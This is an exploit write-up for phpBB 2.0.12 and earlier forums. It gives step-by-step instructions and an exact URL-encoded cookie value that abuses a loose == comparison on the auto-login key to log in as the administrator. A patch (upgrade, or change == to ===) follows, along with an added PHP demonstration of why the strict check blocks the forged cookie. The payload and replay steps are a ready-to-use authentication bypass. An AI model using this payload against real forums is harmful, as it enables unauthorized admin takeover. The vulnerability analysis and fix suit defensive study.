Written by pureone@xxxxxxxxxxx
--------------------------------------------------------------------
Exploit : 2.0.x >= phpbb 2.0.12 :
--------------------------------------------------------------------
Let's get on with the show, shall we?
You'll need Firefox, which is found at > http://www.mozilla.org/
You'll also need the Live HTTP Headers plug-in, found at > http://livehttpheaders.mozdev.org/
OK, once those are installed, find yourself a phpBB forum. I suggest you install one locally;
you may need http://www.apachefriends.org/en/xampp.html
& http://prdownloads.sourceforge.net/phpbb/phpBB-2.0.12.zip?download
OK, once that is installed, open your browser at http://127.0.0.1 and open Live HTTP Headers, which is found under Tools.
Look for the packet that says
GET /phpbb2/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
Click Replay. On this line
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
replace the a%3A0%3A%7B%7D with
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
then once again click Replay. Now you should be able to see the admin control panel, and you will be logged in as the admin. Exploited!
--------------------------------------------------------------------
Solution :
--------------------------------------------------------------------
Update to phpBB 2.0.13 or whatever version is out at the time of reading this.
or
open > includes/sessions.php
find: if( $sessiondata['autologinid'] == $auto_login_key )
replace with: if( $sessiondata['autologinid'] === $auto_login_key )
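Why the one-character change works, as an added example (not phpBB's code and not part of the original write-up): the replacement cookie decodes to a serialized array whose autologinid is the boolean true, and PHP's == treats true as equal to any non-empty string. The key value, the function names and the extra hardened_check() are assumptions made for illustration.

```php
<?php
// Added illustration; simplified, not phpBB's actual session code.
// Constructed stand-in for the auto-login key stored for the account.
$auto_login_key = '0123456789abcdef0123456789abcdef';

$cookies = [
    // Constructed: a cookie carrying the real key as a string.
    'legitimate' => serialize(['autologinid' => $auto_login_key, 'userid' => '2']),
    // The replacement value from the write-up; autologinid is a boolean (b:1).
    'write-up'   => urldecode('a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D'),
    // Constructed: a cookie carrying a wrong key of the right type.
    'wrong key'  => serialize(['autologinid' => str_repeat('f', 32), 'userid' => '2']),
];

function loose_check($sessiondata, $key) {
    // Comparison before the fix: == converts operands, and true == "any non-empty string".
    return $sessiondata['autologinid'] == $key;
}

function strict_check($sessiondata, $key) {
    // Comparison after the fix: === also requires the same type, so a boolean never matches.
    return $sessiondata['autologinid'] === $key;
}

function hardened_check($sessiondata, $key) {
    // Goes beyond the page's fix: reject non-string values outright and
    // compare in constant time (hash_equals, PHP >= 5.6).
    return is_array($sessiondata)
        && isset($sessiondata['autologinid'])
        && is_string($sessiondata['autologinid'])
        && hash_equals($key, $sessiondata['autologinid']);
}

foreach ($cookies as $label => $raw) {
    // allowed_classes => false (PHP >= 7.0) keeps unserialize() from creating objects.
    $data = unserialize($raw, ['allowed_classes' => false]);
    printf("%-10s type=%-7s loose=%s strict=%s hardened=%s\n",
        $label,
        gettype($data['autologinid']),
        var_export(loose_check($data, $auto_login_key), true),
        var_export(strict_check($data, $auto_login_key), true),
        var_export(hardened_check($data, $auto_login_key), true));
}
```

Only the loose comparison accepts the write-up's cookie; the strict and hardened checks accept nothing but the string key itself.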
------------------------------------------------------------------------